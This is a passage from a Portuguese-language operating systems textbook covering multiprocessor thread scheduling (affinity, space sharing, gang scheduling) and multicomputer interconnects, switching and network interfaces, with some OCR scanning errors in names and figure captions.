antes de chavear. No entanto, se ele ver que esperou pe- 
los 2 ms inteiros em cada uma das tentativas anteriores, 
ele deve chavear imediatamente e não testar mais. 

Alguns processadores modernos, incluindo o x86, 
oferecem instruções especiais para tornar a espera mais 
eficiente em termos da redução do consumo de energia. 
Por exemplo, as instruções MONITOR/MWAIT no 
x86 permitem que um programa bloqueie até que algum 
outro processador modifique os dados em uma área 
de memória previamente definida. Especificamente, a 
instrução MONITOR define uma faixa de endereçamen- 
to que deve ser monitorada para escritas. A instrução 
MWAIT então bloqueia o thread até que alguém escreva 
para a área. Efetivamente, o thread está testando, mas 
sem queimar muitos ciclos sem necessidade. 


8.1.4 Escalonamento de multiprocessadores 


Antes de examinarmos como o escalonamento é re- 
alizado em multiprocessadores, é necessário determinar 
o que está sendo escalonado. Antigamente, quando to- 
dos os processos tinham apenas um thread, os processos 
eram escalonados — não havia mais nada escalonável. 
Todos os sistemas operacionais modernos dão suporte a 
processos com múltiplos threads, o que torna o escalo- 
namento mais complicado. 

É importante sabermos se os threads são threads de 
núcleo ou de usuário. Se a execução de threads for feita 
por uma biblioteca no espaço do usuário e o núcleo não 
souber de nada a respeito dos threads, então o escalona- 
mento ocorre em uma base por processo como sempre 
ocorreu. Se o núcleo não faz nem ideia de que o thread 
existe, dificilmente ele poderá escaloná-los. 


Com os threads de núcleo, o quadro é diferente. Aqui 
o núcleo está ciente de todos os threads e pode fazer a 
sua escolha entre os threads pertencentes a um processo. 
Nesses sistemas, a tendência é que o núcleo escolha um 
thread para executar, com o processo ao qual ele perten- 
ce tendo apenas um pequeno papel (ou talvez nenhum) 
no algoritmo de seleção do thread. A seguir falaremos 
sobre o escalonamento de threads, mas, é claro, em um 
sistema com processos de thread único ou threads im- 
plementados no espaço do usuário, são os processos que 
passam por escalonamento. 

Processo versus thread não é a única questão de 
escalonamento. Em um uniprocessador, o escalona- 
mento é unidimensional. A única questão que deve ser 
respondida (repetidamente) é: “Qual thread deve ser 
executado em seguida?”. Em um multiprocessador, o 
escalonamento tem duas dimensões. O escalonador tem 
de decidir em qual thread executar e em qual CPU. Essa 
dimensão extra complica muito o escalonamento em 
multiprocessadores. 

Outro fator complicador é que em alguns sistemas, to- 
dos os threads são não relacionados, pertencendo a diferen- 
tes processos e não tendo nada a ver um com o outro. Em 
outros, eles vêm em grupos, todos pertencendo à mesma 
aplicação e trabalhando juntos. Um exemplo da primeira 
situação é um sistema de servidores no qual usuários inde- 
pendentes iniciam processos independentes. Os threads de 
processos diferentes não são relacionados e cada um pode 
ser escalonado sem levar em consideração o outro. 

Um exemplo da segunda situação ocorre regular- 
mente nos ambientes de desenvolvimento de progra- 
mas. Grandes sistemas muitas vezes consistem em um 
determinado número de arquivos de cabeçalho conten- 
do macros, definições de tipos e declarações variáveis 
que são usadas pelos arquivos com o código de verdade. 
Quando um arquivo cabeçalho é modificado, todos os 
arquivos de código que o incluem devem ser recompila- 
dos. O programa make é comumente usado para geren- 
ciar o desenvolvimento. Quando o make é invocado, ele 
inicia apenas a compilação daqueles arquivos de código 
que devem ser recompilados devido a mudanças nos ar- 
quivos de cabeçalho ou de código. Arquivos de objeto 
que ainda são válidos não são regenerados. 

A versão original de make fazia o seu trabalho se- 
quencialmente, mas versões mais recentes projetadas 
para multiprocessadores podem iniciar todas as com- 
pilações ao mesmo tempo. Se 10 compilações forem 
necessárias, não faz sentido escalonar 9 delas para exe- 
cutar imediatamente e deixar a última até muito mais 
tarde, já que o usuário não perceberá o trabalho como 
completo até a última ter sido concluída. Nesse caso, 
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faz sentido considerar os threads realizando as compila- 
ções como um grupo e levar isso em consideração du- 
rante o escalonamento. 

Além disso, às vezes é útil escalonar threads que se 
comunicam extensivamente, digamos de uma maneira 
produtor-consumidor, não apenas ao mesmo tempo, 
mas também próximos no espaço. Por exemplo, eles po- 
dem beneficiar-se do compartilhamento de caches. Da 
mesma maneira, em arquiteturas NUMA, pode ajudar 
se eles acessarem a memória que está próxima. 


Tempo compartilhado 


Vamos primeiro abordar o caso do escalonamento 
de threads independentes; mais tarde, consideraremos 
como escalonar threads relacionados. O algoritmo de 
escalonamento mais simples para lidar com threads não 
relacionados é ter uma única estrutura de dados em todo 
sistema para os threads prontos, possivelmente apenas 
uma lista, mas mais provavelmente um conjunto para 
threads em diferentes prioridades como descrito na Fi- 
gura 8.12(a). Aqui as 16 CPUs estão todas atualmente 
ocupadas, e um conjunto priorizado de 14 threads es- 
tão esperando para executar. A primeira CPU a terminar 
o seu trabalho atual (ou ter o seu bloco de threads) é 
a CPU 4, que então trava as filas de escalonamento e 
seleciona o thread mais prioritário, 4, como mostrado 
na Figura 8.12(b). Em seguida, a CPU 12 fica ociosa e 
escolhe o thread B, como ilustrado na Figura 8.12(c). 
Enquanto os threads estiverem completamente não re- 
lacionados, realizar o escalonamento dessa maneira é 
uma escolha razoável e é muito simples de se imple- 
mentar de maneira eficiente. 

Ter uma única estrutura de dados de escalonamen- 
to usada por todas as CPUs compartilha o tempo delas 
de maneira semelhante à sua disposição em um siste- 
ma uniprocessador. Também proporciona um balancea- 
mento de carga automático, pois nunca pode acontecer 
de uma CPU estar ociosa enquanto as outras estão so- 
brecarregadas. Duas desvantagens dessa abordagem são 
a contenção potencial para a estrutura de dados de es- 
calonamento à medida que o número de CPUs cresce 
e a sobrecarga usual na realização do chaveamento de 
contexto quando um thread bloqueia para E/S. 

Também é possível que um chaveamento de contexto 
aconteça quando expirar o quantum de um processo. Em 
um multiprocessador, esse fato apresenta determinadas 
propriedades que não estão presentes em um uniproces- 
sador. Suponha que um thread esteja mantendo uma tra- 
va giratória quando seu quantum expira. Outras CPUs 
esperando na trava giratória simplesmente desperdiçam 
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seu tempo testando até que o thread seja escalonado de 
novo e libere a trava. Em um uniprocessador, travas gi- 
ratórias raramente são usadas; então, se um processo é 
suspenso enquanto ele detém um mutex e outro thread 
inicializa e adquire o mutex ele será imediatamente blo- 
queado. Assim pouco tempo é desperdiçado. 

Para driblar essa anomalia, alguns sistemas usam o 
escalonamento inteligente, no qual um thread adquirin- 
do uma trava giratória ajusta um sinalizador de processo 
(processwide flag) para mostrar que atualmente detém 
a trava giratória (ZAHORJAN et al., 1991). Quando ele 
libera a trava, ele baixa o sinalizador. O escalonador não 
para, então, um thread que retém uma trava giratória, 
mas em vez disso, dá a ele um pouco mais de tempo 
para completar sua região crítica e liberar a trava. 

Outra questão relevante no escalonamento é o fato 
de que enquanto todas as CPUs são iguais, algumas são 
mais iguais. Em particular, quando o thread 4 executou 
por um longo tempo na CPU kK, a cache da CPU k estará 
cheia de blocos de 4. Se 4 for logo executado de novo, 
ele pode ter um desempenho melhor do que se ele for 
executado na CPU k, pois a cache de k ainda pode conter 
alguns dos blocos de 4. Ter blocos da cache pré-carrega- 
dos aumentará a taxa de acerto da cache e, desse modo, 
a velocidade do thread. Além disso, a TLB também pode 
conter as páginas certas, reduzindo suas faltas. 

Alguns multiprocessadores levam esse efeito em con- 
sideração e usam o que é chamado de escalonamento 
por afinidade (VASWANI e ZAHORJAN, 1991). A 
ideia básica aqui é fazer um esforço sério para que um 
thread execute na mesma CPU que ele executou da últi- 
ma vez. Uma maneira de criar essa afinidade é usar um 
algoritmo de escalonamento de dois níveis. Quando 
um thread é criado, ele é designado para uma CPU, por 
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exemplo, baseado em qual CPU tem a menor carga no 
momento. Essa alocação de threads para CPUs é o nível 
mais alto do algoritmo. Como resultado dessa política, 
cada CPU adquire a sua própria coleção de threads. 

O escalonamento real dos threads é o nível mais 
baixo do algoritmo. Ele é feito por cada CPU separa- 
damente, usando prioridades ou algum outro meio. Ao 
tentar manter um thread na mesma CPU por sua vida 
inteira, a afinidade de cache é maximizada. No entanto, 
se uma CPU não tem threads para executar, ela toma um 
de outra CPU em vez de ficar ociosa. 

O escalonamento em dois níveis traz três benefícios. 
Primeiro, ele distribui a carga de maneira aproximadamen- 
te uniforme entre as CPUs disponíveis. Segundo, quando 
possível, é obtida uma vantagem por afinidade de cache. 
Terceiro, ao dar a cada CPU sua própria lista pronta, a con- 
tenção para as listas prontas é minimizada, pois tentativas 
de usar a lista pronta de outra CPU são relativamente raras. 


Compartilhamento de espaço 


A outra abordagem geral para o escalonamento de 
multiprocessadores pode ser usada quando threads são 
relacionados uns com os outros de alguma maneira. An- 
teriormente, mencionamos o exemplo do make paralelo 
como um caso. Também, muitas vezes ocorre que um 
único processo tem múltiplos threads que trabalham 
juntos. Por exemplo, se os threads de um processo se 
comunicam muito, é interessante tê-los executando ao 
mesmo tempo. O escalonamento de múltiplos threads 
ao mesmo tempo através de múltiplas CPUs é chamado 
de compartilhamento de espaço. 

O algoritmo de compartilhamento de espaço mais 
simples funciona dessa maneira. Presuma que um grupo 


inteiro de threads relacionados é criado ao mesmo tem- 
po. No momento em que ele é criado, o escalonador 
confere para ver se há tantas CPUs livres quanto há 
threads. Se existirem, cada thread recebe sua própria 
CPU dedicada (isto é, não multiprogramada) e todos 
são inicializados. Se não houver, nenhum dos threads 
pode ser inicializado até que haja um número suficiente 
de CPUs disponível. Cada thread detém sua CPU até 
que termine, momento em que ela é colocada de volta 
para o pool de CPUs disponíveis. Se um thread bloquear 
na E/S, ele continua a segurar a CPU, que está simples- 
mente ociosa até o thread despertar. Quando aparecer o 
próximo lote de threads, o mesmo algoritmo é aplicado. 

Em qualquer instante no tempo, o conjunto de CPUs 
é dividido estaticamente em uma série de divisões, cada 
uma executando os threads de um processo. Na Figura 
8.13, temos divisões de tamanhos 4, 6, 8 e 12 CPUs, 
com 2 CPUs não alocadas, por exemplo. Com o passar 
do tempo, o número e tamanho das divisões mudam à 
medida que novos threads são criados e os antigos são 
concluídos e terminam. 

Periodicamente, decisões de escalonamento preci- 
sam ser tomadas. Em sistemas de uniprocessadores, o 
trabalho mais curto primeiro é um algoritmo bem co- 
nhecido para o escalonamento de lote. O algoritmo aná- 
logo para um multiprocessador é escolher o processo 
que estiver precisando do menor número de ciclos de 
CPUs, isto é, o thread cujo contador de CPU versus 
tempo de execução seja o menor entre os candidatos. 
No entanto, na prática, essa informação raramente en- 
contra-se disponível, então é difícil levar o algoritmo 
adiante. Na realidade, estudos demonstraram que, na 
prática, é difícil superar o primeiro algoritmo a chegar, 
primeiro a ser servido (KRUEGER et al., 1994). 

Nesse modelo simples de divisão, um thread somen- 
te pede algum número determinado de CPUs e as recebe 
todas, ou tem de esperar até que estejam disponíveis. 
Uma abordagem diferente é deixar que os threads ge- 
renciem ativamente o grau de paralelismo. Um método 
para gerenciar o paralelismo é ter um servidor central 
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que controle quais threads estão executando e querem 
executar e quais são as exigências de CPU minima e 
máxima (TUCKER e GUPTA, 1989). Periodicamen- 
te, cada aplicação indaga o servidor central para saber 
quantas CPUs ela pode usar. A aplicação então ajusta 
o número de threads para mais ou para menos a fim de 
corresponder com o que há disponível. 

Por exemplo, um servidor da web pode ter 5, 10, 20 
ou qualquer outro número de threads executando em pa- 
ralelo. Se ele atualmente tem 10 threads e de repente há 
mais demanda por CPUs e lhe dizem para baixar para cin- 
co, quando os próximos cinco threads terminarem o seu 
trabalho atual, eles serão informados que devem sair em 
vez de receber mais trabalho. Esse esquema permite que os 
tamanhos das partições variem dinamicamente para casar 
melhor com a carga de trabalho atual, uma solução melhor 
do que a apresentada pelo sistema fixo da Figura 8.13. 


Escalonamento em bando 


Uma vantagem clara do compartilhamento de espaço 
é a eliminação da multiprogramação, que elimina a so- 
brecarga de chaveamento de contexto. No entanto, uma 
desvantagem igualmente clara é o tempo desperdiçado 
quando uma CPU bloqueia e não tem nada a fazer até 
encontrar-se pronta de novo. Em consequência, as pes- 
soas procuraram por algoritmos que buscam escalonar 
tanto no tempo quanto no espaço juntos, especialmente 
para threads que criam múltiplos threads, e que em geral 
precisam comunicar-se uns com os outros. 

Para ver o tipo de problema que pode ocorrer quando 
os threads de um processo são escalonados independente- 
mente, considere um sistema com os threads 4, e 4, per- 
tencendo ao processo 4 e os threads B, e B, pertencendo 
ao processo B. Os threads 4, e B, compartilham tempo na 
CPU 0; os threads 4, e B, compartilham tempo na CPU 1. 
Os threads 4, e 4, precisam comunicar-se frequentemente. 
O padrão de comunicação é que 4, envie a 4, uma men- 
sagem, com 4, então enviando de volta uma mensagem 


ale: Um conjunto de 32 CPUs agrupadas em quatro partições, com duas CPUs disponíveis. 
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para 4,, seguida por outra sequência similar, comum em 
situações cliente-servidor. Suponha que por acaso 4, e B, 
comecem primeiro, como mostrado na Figura 8.14. 

Na faixa de tempo 0, 4, envia para 4, uma solicitação, 
mas A não a recebe até que ele executa na faixa de tempo 1 
começando em 100 ms. Ele envia a resposta imediatamen- 
te, mas 4, não a recebe até executar de novo em 200 ms. 
O resultado líquido é uma sequência solicitação-resposta a 
cada 200 ms. Não chega a ser um bom desempenho. 

A solução para esse problema é o escalonamento 
em bando (gang scheduling), que é uma evolução do 
coescalonamento (OUSTERHOUT, 1982). O escalona- 
mento em bando tem três partes: 


1. Grupos de threads relacionados são escalonados 
como uma unidade, um bando. 

2. Todos os membros do bando executam ao mes- 
mo tempo em diferentes CPUs com tempo 
compartilhado. 

3. Todos os membros do bando começam e termi- 
nam juntos suas faixas de tempo. 


O truque que faz o escalonamento de bando funcio- 
nar é que todas as CPUs são escalonadas de maneira 
sincronizada. Isso significa que o tempo é dividido em 
quanta discretos como na Figura 8.14. No começo de 
cada quantum novo, todas as CPUs são escalonadas no- 
vamente, com um thread novo sendo iniciado em cada 


uma. No começo de cada quantum seguinte, outro even- 
to de escalonamento acontece. Entre eles, não ocorre 
nenhum escalonamento. Se um thread bloqueia, a sua 
CPU permanece ociosa até o fim do quantum. 

Um exemplo de como funciona o escalonamento de 
bando é dado na Figura 8.15. Aqui temos um multiproces- 
sador com seis CPUs sendo usadas por cinco processos, 4 
até E, com um total de 24 threads prontos. Durante o in- 
tervalo de tempo 0, os threads 4, até 4, são escalonados e 
executados. Durante o intervalo de tempo 1, os threads B, 
B, B, Cy C e C, são escalonados e executados. Durante 
o intervalo de tempo 2, os cinco threads de D e E, são exe- 
cutados. Os seis threads restantes pertencentes ao thread E 
são executados no intervalo de tempo 3. Então o ciclo se 
repete, com o intervalo de tempo 4 sendo o mesmo que o 
intervalo de tempo 0 e assim por diante. 

A ideia do escalonamento em bando é ter todos os 
threads de um processo executados juntos, ao mesmo 
tempo, em diferentes CPUs, de maneira que se um deles 
envia uma solicitação para outro, ele receberá a mensa- 
gem quase imediatamente e será capaz de responder da 
mesma forma. Na Figura 8.15, como todos os threads 
A estão executando juntos, durante um quantum, eles 
podem enviar e receber uma quantidade muito grande 
de mensagens em um quantum, desse modo eliminando 
o problema da Figura 8.14. 
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8.2 Multicomputadores 


Multiprocessadores são populares e atraentes por- 
que eles oferecem um modelo de comunicação simples: 
todas as CPUs compartilham uma memória comum. 
Processos podem escrever mensagens para a memória 
que podem então ser lidas por outros processos. A sin- 
cronização pode ser feita usando mutexes, semáforos, 
monitores e outras técnicas bem estabelecidas. O único 
problema é que grandes multiprocessadores são difíceis 
de construir e, portanto, são caros. Então algo mais é 
necessário se formos aumentar para um grande número 
de CPUs. 

Para contornar esses problemas, muita pesquisa foi 
feita sobre multicomputadores, que são CPUs estreita- 
mente acopladas que não compartilham memória. Cada 
uma tem a sua própria memória, como mostrado na Fi- 
gura 8.1(b). Esses sistemas também são conhecidos por 
uma série de outros nomes, incluindo aglomerados de 
computadores e COWS (Clusters Of Workstations 
— aglomerados de estações de trabalho). Serviços de 
computação na nuvem são sempre construídos em mul- 
ticomputadores, pois eles precisam ser grandes. 

Multicomputadores são fáceis de construir, pois o 
componente básico é apenas um PC “despido”, sem 
teclado, mouse ou monitor, mas com uma placa de in- 
terface de rede de alto desempenho. É claro, o segredo 
para se atingir um alto desempenho é projetar a rede 
de interconexão e a placa de interface inteligentemente. 
Esse problema é completamente análogo a construir a 
memória compartilhada em um multiprocessador [por 
exemplo, ver Figura 8.1(b)]. No entanto, a meta é en- 
viar mensagens em uma escala de tempo de microsse- 
gundos, em vez de acessar a memória em uma escala 
de tempo de nanossegundos, então é algo mais simples, 
barato e fácil de conseguir. 

Nas seções a seguir, examinaremos brevemente pri- 
meiro o hardware de multicomputadores, em especial 
o hardware de interconexão. Então passaremos para o 
software, começando com um software de comunica- 
ção de baixo nível e depois um de comunicação de alto 
nível. Também examinaremos uma maneira como a me- 
mória compartilhada pode ser alcançada em sistemas 
que não a têm. Por fim, examinaremos o escalonamento 
e o balanceamento de carga. 


8.2.1 Hardware de multicomputadores 


O nó básico de um multicomputador consiste em 
uma CPU, memória, uma interface de rede e às vezes um 
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disco rígido. O nó pode ser empacotado em um gabinete 
padrão de PC, mas o monitor, teclado e mouse estão 
quase sempre ausentes. Às vezes essa configuração é 
chamada de estação de trabalho sem cabeça (headless 
workstation), pois não há um usuário com uma cabeça 
na frente dela. Uma estação de trabalho com um usuário 
humano deveria ser chamada logicamente de uma “es- 
tação de trabalho com cabeça”, mas por alguma razão 
isso não ocorre. Em alguns casos, o PC contém uma 
placa de multiprocessador com duas ou quatro CPUs, 
possivelmente cada uma com um chip de dois, quatro 
ou oito núcleos, em vez de uma única CPU, mas para 
simplificar as coisas, presumiremos que cada nó tem 
uma CPU. Muitas vezes centenas ou mesmo milhares 
de nós estão ligados para formar um multicomputador. 
A seguir falaremos um pouco sobre como esse hardware 
é organizado. 


Tecnologia de interconexão 


Cada nó tem uma placa de interface de rede com 
um ou dois cabos (ou fibras) saindo dela. Esses cabos 
conectam-se a outros cabos ou a comutadores. Em um 
sistema pequeno, pode haver um comutador para o qual 
todos os nós estão conectados na topologia da estrela da 
Figura 8.16(a). As redes modernas de padrão Ethernet 
usam essa topologia. 

Como alternativa ao projeto de um comutador único, 
os nós podem formar um anel, com dois fios saindo da 
placa de interface da rede, um para o nó à esquerda e 
outro indo para o nó à direita, como mostrado na Figura 
8.16(b). Nessa topologia, comutadores não são necessá- 
rios e nenhum é mostrado. 

A grade ou malha da Figura 8.16(c) é um projeto 
bidimensional que foi usado em muitos sistemas co- 
merciais. Ela é altamente regular e fácil de escalar para 
tamanhos grandes e tem um diâmetro, o caminho mais 
longo entre quaisquer dois nós, que aumenta somente 
com a raiz quadrada do número de nós. Uma variante da 
grade é o toro duplo da Figura 8.16(d), que é uma grade 
com as margens conectadas. Não apenas ele é mais to- 
lerante a falhas do que a grade, mas também o diâmetro 
é menor, pois os cantos opostos podem se comunicar 
agora em apenas dois passos. 

O cubo da Figura 8.16(e) é uma topologia tridimen- 
sional regular. Ilustramos um cubo 2 x 2 x 2, mas no 
caso mais geral ele poderia ser um cubo k x k x k. Na 
Figura 8.16(f) temos um cubo tetradimensional cons- 
tituído de dois cubos tridimensionais com os nós cor- 
respondentes conectados. Poderíamos fazer um cubo de 
cinco dimensões clonando a estrutura da Figura 8.16(f) 
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Sele) sys Várias topologias de interconexão. (a) Um comutador simples. (b) Um anel. (c) Uma grade. (d) Um toro duplo. (e) Um 


cubo. (f) Um hipercubo 4D. 





e conectando os nós correspondentes para formar um 
bloco de quatro cubos. Para ir para seis dimensões, 
poderíamos replicar o bloco de quatro cubos e interco- 
nectar os nós correspondentes, e assim por diante. Um 
cubo n-dimensional formado dessa maneira é chamado 
de um hipercubo. 

Muitos computadores paralelos usam uma topolo- 
gia de hipercubo, pois o diâmetro cresce linearmente 
com a dimensionalidade. Colocada a questão em outras 
palavras, o diâmetro é o logaritmo na base 2 do núme- 
ro de nós. Por exemplo, um hipercubo de dimensão 10 
tem 1.024 nós, mas um diâmetro de apenas 10, propor- 
cionando excelentes propriedades de atraso. Observe 
que, em comparação, 1.024 nós arranjados como uma 
grade 32 x 32 têm um diâmetro de 62, mais de seis 
vezes pior do que o hipercubo. O preço pago pelo dia- 
metro menor é que o leque de saídas (fanout), e assim 
o número de ligações (e o custo), é muito maior para 
o hipercubo. 

Dois tipos de esquemas de comutação são usados em 
multicomputadores. No primeiro, cada mensagem é pri- 
meiro quebrada (seja pelo software do usuário, ou pela 
interface de rede) em um bloco de algum comprimento 
máximo chamado de pacote. O esquema de comutação, 
chamado de comutação de pacotes armazenar e enca- 
minhar (store-and-forward packet switching), consiste 
no pacote sendo injetado no primeiro comutador pela 
placa de interface de rede do nó remetente, como mos- 
trado na Figura 8.17(a). Os bits chegam um de cada vez, 
e quando o pacote inteiro chega a um buffer de entrada, 


ele é copiado para a linha levando ao próximo comu- 
tador ao longo do caminho, como mostrado na Figura 
8-17(b). Quando chega ao comutador ligado ao nó de 
destino, como mostrado na Figura 8.17(c), o pacote é 
copiado para aquela placa de interface de rede daquele 
nó e eventualmente para sua RAM. 

Embora a comutação de pacotes armazenar e enca- 
minhar seja flexível e eficiente, ela tem o problema de 
aumentar a latência (atraso) através da rede de interco- 
nexão. Suponha que o tempo para mover um pacote por 
um passo na Figura 8.17 seja T ns. Já que o pacote deve 
ser copiado quatro vezes da CPU 1 para a CPU 2 (de 4, 
para C, para D, e para a CPU de destino), e nenhuma có- 
pia pode começar até que a anterior tenha sido termina- 
da, a latência através da rede de interconexão é 47. Uma 
saída é projetar uma rede na qual um pacote possa ser 
logicamente dividido em unidades menores. Tão logo a 
primeira unidade chega a um comutador, ela possa ser 
passada adiante, mesmo antes de o final do pacote ter 
chegado. Concebivelmente, a unidade poderia ser tão 
pequena quanto 1 bit. 

O outro esquema de comutação, comutação de cir- 
cuito (circuit switching), consiste no primeiro comutador 
estabelecer um caminho através de todos os comutadores 
até o comutador-destino. Uma vez que o caminho tenha 
sido estabelecido, os bits são bombeados até o fim, da 
origem ao destino, sem parar e o mais rápido possível. 
Não há armazenamento em buffer intermediário nos co- 
mutadores intervenientes. A comutação de circuito exige 
uma fase de preparação, que leva algum tempo, mas é 


ia (clus ya) Comutação de pacotes armazenar e encaminhar. 


CPU 1 


Comutador de 
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mais rápida, uma vez que a preparação tenha sido com- 
pleta. Após o pacote ter sido enviado, o caminho preci- 
sa ser desfeito novamente. Uma variação da comutação 
de circuito, chamada roteamento buraco de minhoca 
(wormhole routing), divide cada pacote em subpacotes e 
permite que o primeiro subpacote comece a fluir mesmo 
antes de o caminho inteiro ter sido construído. 


Interfaces de rede 


Todos os nós em um multicomputador têm uma placa 
contendo a conexão do nó para a rede de interconexão 
que mantém o multicomputador unido. A maneira como 
essas placas são construídas e como elas se conectam 
a CPU principal e RAM tem implicações substanciais 
para o sistema operacional. Examinaremos agora bre- 
vemente algumas das questões. Esse material é baseado 
em parte no trabalho de Bhoedjang (2000). 


Em virtualmente todos os multicomputadores, a placa 
de interface contém uma RAM substancial para arma- 
zenar pacotes de entrada e saída. Em geral, um pacote 
de saída tem de ser copiado para a RAM da placa de 
interface antes que ele possa ser transmitido para o pri- 
meiro comutador. A razão para esse projeto é que mui- 
tas redes de interconexão são sincronas, então, assim 
que uma transmissão de pacote tenha começado, os bits 
devem continuar a fluir em uma taxa constante. Se o pa- 
cote está na RAM principal, esse fluxo contínuo saindo 
da rede não pode ser garantido devido a outro tráfego no 
barramento de memória. Usando uma RAM dedicada 
na placa de interface elimina esse problema. O projeto é 
mostrado na Figura 8.18. 

O mesmo problema ocorre com os pacotes de en- 
trada. Os bits chegam da rede a uma taxa constante e 
muitas vezes extremamente alta. Se a placa de interface 
de rede não puder armazená-los em tempo real à medida 


Jei TERE Posição das placas de interface de rede em um multicomputador. 
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que eles chegam, dados serão perdidos. Aqui, de novo, 
tentar passar por cima do barramento de sistema (por 
exemplo, o barramento PCI) para a RAM principal é ar- 
riscado demais. Já que a placa de rede geralmente é co- 
nectada ao barramento PCI, esta é a única conexão que 
ela tem com a RAM principal, então competir por esse 
barramento com o disco e todos os outros dispositivos 
de E/S é inevitável. É mais seguro armazenar pacotes de 
entrada na RAM privada da placa de interface e então 
copiá-las para a RAM principal mais tarde. 

A placa de interface pode ter um ou mais canais de 
DMA ou mesmo uma CPU completa (ou talvez mesmo 
CPUs completas) na placa. Os canais DMA podem copiar 
pacotes entre a placa de interface e a RAM principal a 
uma alta velocidade solicitando transferências de bloco no 
barramento do sistema, desse modo transferindo diversas 
palavras sem ter de solicitar o barramento separadamente 
para cada palavra. No entanto, é precisamente esse tipo de 
transferência de bloco, que interrompe o barramento de 
sistema para múltiplos ciclos de barramento, que torna a 
RAM da placa de interface necessária em primeiro lugar. 

Muitas placas de interface têm uma CPU nelas, pos- 
sivelmente em adição a um ou mais canais de DMA. 
Elas são chamadas de processadores de rede e estão 
se tornando cada dia mais poderosas (EL FERKOUSS 
etal., 2011). Esse projeto significa que a CPU principal 
pode descarregar algum trabalho para a placa da rede, 
como o tratamento de transmissão confiável (se o hard- 
ware subjacente puder perder pacotes), multicasting 
(enviar um pacote para mais de um destino), compac- 
tação/descompactação, criptografia/descriptografia, e 
cuidar da proteção em um sistema que tem múltiplos 
processos. No entanto, ter duas CPUs significa que elas 
precisam sincronizar-se para evitar condições de corri- 
da, o que acrescenta uma sobrecarga extra e significa 
mais trabalho para o sistema operacional. 

Copiar dados através de camadas é seguro, mas não 
necessariamente eficiente. Por exemplo, um navegador 
solicitando dados de um servidor remoto na web cria- 
rá uma solicitação no espaço de endereçamento do na- 
vegador. Essa solicitação é subsequentemente copiada 
para o núcleo, assim o TCP e o IP podem tratá-la. Em 
seguida, os dados são copiados para a memória da inter- 
face da rede. Na outra extremidade, o inverso acontece: 
os dados são copiados de uma placa de rede para um 
buffer de núcleo, e de um buffer de núcleo para o ser- 
vidor da web. Um número considerável de cópias, infe- 
lizmente. Cada cópia introduz sobrecarga, não somente 
o ato de copiar em si, mas também a pressão sobre a 
cache, a TLB etc. Em consequência, a latência sobre 
essas conexões de rede é alta. 


Na seção a seguir, aprofundamos a discussão sobre téc- 
nicas para reduzir o máximo possível a sobrecarga devido 
a cópias, poluição de cache e comutação de contexto. 


8.2.2 Software de comunicação de baixo nível 


O inimigo da comunicação de alto desempenho em 
sistemas de multicomputadores é a cópia em excesso 
de pacotes. No melhor caso, haverá uma cópia da RAM 
para a placa de interface no nó fonte, uma cópia da placa 
de interface fonte para a placa de interface destinatária 
(se não ocorrer nenhum armazenamento e encaminha- 
mento no caminho) e uma cópia dali para a RAM de 
destino, um total de três cópias. No entanto, em muitos 
sistemas é até pior. Em particular, se a placa de inter- 
face for mapeada no espaço de endereçamento virtual 
do núcleo e não no espaço de endereçamento virtual do 
usuário, um processo do usuário pode enviar um pacote 
somente emitindo uma chamada de sistema que é cap- 
turada para o núcleo. Os núcleos talvez tenham de co- 
piar os pacotes para sua própria memória tanto na saída 
quanto na entrada, a fim de evitar, por exemplo, faltas 
de páginas enquanto transmitem pela rede. Além disso, 
o núcleo receptor provavelmente não sabe onde colocar 
os pacotes que chegam até que ele tenha uma chance de 
examiná-los. Esses cinco passos de cópia estão ilustra- 
dos na Figura 8.18. 

Se cópias de e para a RAM são o gargalo, as cópias 
extras de e para o núcleo talvez dobrem o atraso de uma 
extremidade à outra e cortem a vazão pela metade. Para 
evitar esse impacto sobre o desempenho, muitos multi- 
computadores mapeiam a placa de interface diretamen- 
te no espaço do usuário para colocar pacotes na placa 
diretamente, sem o envolvimento do núcleo. Embora 
essa abordagem definitivamente ajude o desempenho, 
ela introduz dois problemas. 

Primeiro, e se vários processos estão executando no 
nó e precisam de acesso de rede para enviar pacotes? 
Qual ficará com a placa de interface em seu espaço 
de endereçamento? Ter uma chamada de sistema para 
mapear a placa dentro e fora de um espaço de ende- 
reçamento é caro, mas se apenas um processo ficar 
com a placa, como os outros enviarão pacotes? E o 
que acontece se a placa for mapeada no espaço de en- 
dereçamento virtual de 4 e um pacote chegar para o 
processo B, especialmente se 4 e B tiverem proprie- 
tários diferentes e nenhum deles quiser fazer esforço 
para ajudar o outro? 

Uma solução é mapear a placa de interface para to- 
dos os processos que precisam dela, mas então um me- 
canismo é necessário para evitar condições de corrida. 


Por exemplo, se 4 reivindicar um buffer na placa de in- 
terface, então, por causa do fatiamento do tempo, B exe- 
cutar e reivindicar o mesmo buffer, o resultado será um 
desastre. Algum tipo de mecanismo de sincronização é 
necessário, mas esses mecanismos, como mutexes, só 
funcionam quando se presume que os processos este- 
jam cooperando. Em um ambiente compartilhado com 
múltiplos usuários todos apressados para realizar o seu 
trabalho, um usuário pode simplesmente travar o mutex 
associado com a placa e nunca o liberar. A conclusão 
aqui é que mapear a placa da interface no espaço do 
usuário realmente funciona bem só quando há apenas 
um processo do usuário executando em cada nó, a não 
ser que precauções extras sejam tomadas (por exem- 
plo, processos diferentes recebem porções diferentes 
da RAM da interface mapeada em seus espaços de 
endereçamento). 

O segundo problema é que o núcleo pode precisar 
realmente de acesso à própria rede de interconexão, por 
exemplo, a fim de acessar o sistema de arquivos em um 
nó remoto. Ter o núcleo compartilhando a placa de in- 
terface com qualquer usuário não é uma boa ideia. Su- 
ponha que enquanto a placa era mapeada no espaço do 
usuário, um pacote do núcleo chegasse. Ou ainda que o 
processo do usuário enviasse um pacote para uma má- 
quina remota fingindo ser o núcleo. A conclusão é que 
o projeto mais simples é ter duas placas de interface de 
rede, uma mapeada no espaço do usuário para tráfego 
de aplicação e outra mapeada no espaço do núcleo pelo 
sistema operacional. Muitos multicomputadores fazem 
precisamente isso. 

Por outro lado, interfaces de rede mais novas são 
frequentemente multifila, o que significa que elas têm 
mais de um buffer para dar suporte com eficiência a 
múltiplos usuários. Por exemplo, a série 1350 de pla- 
cas de rede da Intel tem 8 filas de enviar e 8 de receber, 
além de ser virtualizável para muitas portas virtuais. 
Melhor ainda, a placa dá suporte à afinidade de nú- 
cleo de processamento. Especificamente, ela tem a sua 
própria lógica de espalhamento (hashing) para ajudar 
a direcionar cada pacote para um processo adequado. 
Como é mais rápido processar todos os segmentos no 
mesmo fluxo de TCP no mesmo processador (onde as 
caches estão quentes), a placa pode usar a lógica de 
espalhamento para organizar os campos de fluxo de 
TCP (endereços de IP e números de porta TCP) e adi- 
